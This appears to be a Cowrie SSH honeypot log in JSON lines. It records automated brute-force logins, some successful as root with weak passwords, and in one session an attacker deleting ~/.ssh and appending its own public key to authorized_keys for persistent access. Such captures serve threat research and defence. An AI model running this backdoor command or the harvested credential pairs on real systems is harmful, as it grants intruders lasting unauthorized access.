{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:20:29.127416Z","src_ip":"159.65.146.196","session":"d1c2420262f7"}
{"eventid":"cowrie.login.success","username":"root","password":"123123Aa","message":"login attempt [root/123123Aa] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:20:30.222031Z","src_ip":"159.65.146.196","session":"d1c2420262f7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:20:30.771665Z","src_ip":"159.65.146.196","session":"d1c2420262f7"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:20:30.772363Z","src_ip":"159.65.146.196","session":"d1c2420262f7"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:20:30.773842Z","src_ip":"159.65.146.196","session":"d1c2420262f7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:20:31.038113Z","src_ip":"159.65.146.196","session":"d1c2420262f7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:20:31.625570Z","src_ip":"159.65.146.196","session":"d1c2420262f7"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T01:20:31.626288Z","src_ip":"159.65.146.196","session":"d1c2420262f7"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T01:20:31.890925Z","src_ip":"159.65.146.196","session":"d1c2420262f7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:20:31.891884Z","src_ip":"159.65.146.196","session":"d1c2420262f7"}
{"eventid":"cowrie.session.connect","src_ip":"159.65.146.196","src_port":42146,"dst_ip":"1.2.3.4","dst_port":22,"session":"09fe92939bbd","protocol":"ssh","message":"New connection: 159.65.146.196:42146 (1.2.3.4:22) [session: 09fe92939bbd]","sensor":"my-vps","timestamp":"2025-08-31T01:20:32.138404Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:20:32.139470Z","src_ip":"159.65.146.196","session":"09fe92939bbd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:20:32.394118Z","src_ip":"159.65.146.196","session":"09fe92939bbd"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T01:20:33.455054Z","src_ip":"159.65.146.196","session":"09fe92939bbd"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:20:34.712481Z","src_ip":"159.65.146.196","session":"09fe92939bbd"}
{"eventid":"cowrie.session.connect","src_ip":"159.65.146.196","src_port":42160,"dst_ip":"1.2.3.4","dst_port":22,"session":"7dcc8907ee83","protocol":"ssh","message":"New connection: 159.65.146.196:42160 (1.2.3.4:22) [session: 7dcc8907ee83]","sensor":"my-vps","timestamp":"2025-08-31T01:20:34.974926Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:20:34.975603Z","src_ip":"159.65.146.196","session":"7dcc8907ee83"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:20:35.234887Z","src_ip":"159.65.146.196","session":"7dcc8907ee83"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:20:36.308066Z","src_ip":"159.65.146.196","session":"7dcc8907ee83"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:20:36.568604Z","src_ip":"159.65.146.196","session":"7dcc8907ee83"}
{"eventid":"cowrie.session.closed","duration":"7.7","message":"Connection lost after 7.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:20:36.572211Z","src_ip":"159.65.146.196","session":"d1c2420262f7"}
{"eventid":"cowrie.session.connect","src_ip":"115.190.94.119","src_port":45754,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e551f89911a","protocol":"ssh","message":"New connection: 115.190.94.119:45754 (1.2.3.4:22) [session: 0e551f89911a]","sensor":"my-vps","timestamp":"2025-08-31T01:20:48.403092Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:20:48.404193Z","src_ip":"115.190.94.119","session":"0e551f89911a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:20:48.616216Z","src_ip":"115.190.94.119","session":"0e551f89911a"}
{"eventid":"cowrie.login.failed","username":"m1","password":"m1","message":"login attempt [m1/m1] failed","sensor":"my-vps","timestamp":"2025-08-31T01:20:49.495975Z","src_ip":"115.190.94.119","session":"0e551f89911a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44976,"dst_ip":"1.2.3.4","dst_port":22,"session":"f877790cead0","protocol":"ssh","message":"New connection: 212.227.235.229:44976 (1.2.3.4:22) [session: f877790cead0]","sensor":"my-vps","timestamp":"2025-08-31T01:20:52.323721Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:20:53.569174Z","src_ip":"212.227.235.229","session":"f877790cead0"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:20:53.570119Z","src_ip":"212.227.235.229","session":"f877790cead0"}
{"eventid":"cowrie.login.failed","username":"dev","password":"welcome","message":"login attempt [dev/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T01:20:59.679510Z","src_ip":"212.227.235.229","session":"f877790cead0"}
{"eventid":"cowrie.session.closed","duration":"9.2","message":"Connection lost after 9.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:21:01.511183Z","src_ip":"212.227.235.229","session":"f877790cead0"}
{"eventid":"cowrie.session.connect","src_ip":"102.88.137.80","src_port":33707,"dst_ip":"1.2.3.4","dst_port":22,"session":"f4883a13abda","protocol":"ssh","message":"New connection: 102.88.137.80:33707 (1.2.3.4:22) [session: f4883a13abda]","sensor":"my-vps","timestamp":"2025-08-31T01:21:10.650239Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:21:10.651176Z","src_ip":"102.88.137.80","session":"f4883a13abda"}
{"eventid":"cowrie.client.kex","hassh":"713bd9cc935561939c02dad25af2d3de","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes256-ctr","aes256-cbc","aes128-gcm@openssh.com","aes128-ctr","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 713bd9cc935561939c02dad25af2d3de","sensor":"my-vps","timestamp":"2025-08-31T01:21:10.773647Z","src_ip":"102.88.137.80","session":"f4883a13abda"}
{"eventid":"cowrie.login.failed","username":"fivem","password":"123","message":"login attempt [fivem/123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:21:11.304276Z","src_ip":"102.88.137.80","session":"f4883a13abda"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:21:12.428882Z","src_ip":"102.88.137.80","session":"f4883a13abda"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35916,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b1e086d89fb","protocol":"ssh","message":"New connection: 212.227.125.160:35916 (1.2.3.4:22) [session: 0b1e086d89fb]","sensor":"my-vps","timestamp":"2025-08-31T01:21:15.366574Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:21:15.869100Z","src_ip":"212.227.125.160","session":"0b1e086d89fb"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:21:15.891721Z","src_ip":"212.227.125.160","session":"0b1e086d89fb"}
{"eventid":"cowrie.login.failed","username":"dev","password":"welcome","message":"login attempt [dev/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T01:21:18.417859Z","src_ip":"212.227.125.160","session":"0b1e086d89fb"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:21:19.980194Z","src_ip":"212.227.125.160","session":"0b1e086d89fb"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:21:29.632118Z","src_ip":"212.227.125.160","session":"2a75289f685f"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":49898,"dst_ip":"1.2.3.4","dst_port":22,"session":"b7625d4e742f","protocol":"ssh","message":"New connection: 217.72.205.35:49898 (1.2.3.4:22) [session: b7625d4e742f]","sensor":"my-vps","timestamp":"2025-08-31T01:21:40.954866Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:21:40.956640Z","src_ip":"217.72.205.35","session":"b7625d4e742f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37574,"dst_ip":"1.2.3.4","dst_port":22,"session":"3dd2efcc4b1f","protocol":"ssh","message":"New connection: 212.227.125.160:37574 (1.2.3.4:22) [session: 3dd2efcc4b1f]","sensor":"my-vps","timestamp":"2025-08-31T01:21:48.846715Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:21:49.884225Z","src_ip":"212.227.125.160","session":"3dd2efcc4b1f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:21:49.884893Z","src_ip":"212.227.125.160","session":"3dd2efcc4b1f"}
{"eventid":"cowrie.login.success","username":"root","password":"100@Tailan","message":"login attempt [root/100@Tailan] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:21:55.345370Z","src_ip":"212.227.125.160","session":"3dd2efcc4b1f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55718,"dst_ip":"1.2.3.4","dst_port":22,"session":"1faf5607fd70","protocol":"ssh","message":"New connection: 212.227.235.229:55718 (1.2.3.4:22) [session: 1faf5607fd70]","sensor":"my-vps","timestamp":"2025-08-31T01:21:56.026061Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:21:57.207654Z","src_ip":"212.227.235.229","session":"1faf5607fd70"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cb